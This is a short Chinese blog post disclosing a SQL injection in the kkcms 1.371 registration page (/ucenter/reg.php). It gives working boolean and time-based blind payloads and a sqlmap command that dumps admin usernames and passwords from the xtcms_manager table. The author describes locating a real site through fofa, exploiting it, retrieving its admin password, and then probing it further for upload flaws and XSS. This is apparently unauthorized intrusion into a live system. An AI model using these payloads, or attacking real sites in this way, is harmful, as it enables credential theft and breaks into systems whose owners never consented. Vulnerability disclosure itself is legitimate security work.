白袍的小行星

kkcms最新版(1.371)前台SQL注入

字数统计: 311阅读时长: 1 min
2020/06/07 Share

没事干就去逛了下CNVD,发现有个新出炉的漏洞: kkcms前台SQL注入,审了一下发现很容易就找到了,因为这个cms用户量很小,所以我就直接发出来了。

原作者不知为何已经删去了此项目,所幸有人fork了一份,在这里:https://github.com/Mengfanpro/kkcms

漏洞文件在/ucenter/reg.php

$username直接就带进SQL语句了,有个stripslashes()函数,是去除反斜杠的,关键它也没有反斜杠啊,迷惑。

fofa上找了个站开始测试,没回回显,直接盲注,时间和布尔都可以:

name=1' AND 7105=7105 AND 'hgMh'='hgMh&email=110@qq.com&password=caonima&submit=
name=1' AND (SELECT 8369 FROM (SELECT(SLEEP(5)))PSlF) AND 'u'='u&email=110@qq.com&password=caonima&submit=

sqlmap:

sqlmap -r post.txt --technique=B -T xtcms_manager -C "m_name,m_password" --dump

最后结果,无语的密码:

后台没啥有用的,上传点还挺安全,白名单的后缀名检测,绕不过去。

mysql降权了,非root,所以也没法写shell。

眼睛一瞥,有个友链申请,果不其然XSS.

作者怕是bug修不完干脆把项目删了吧。。。

CATALOG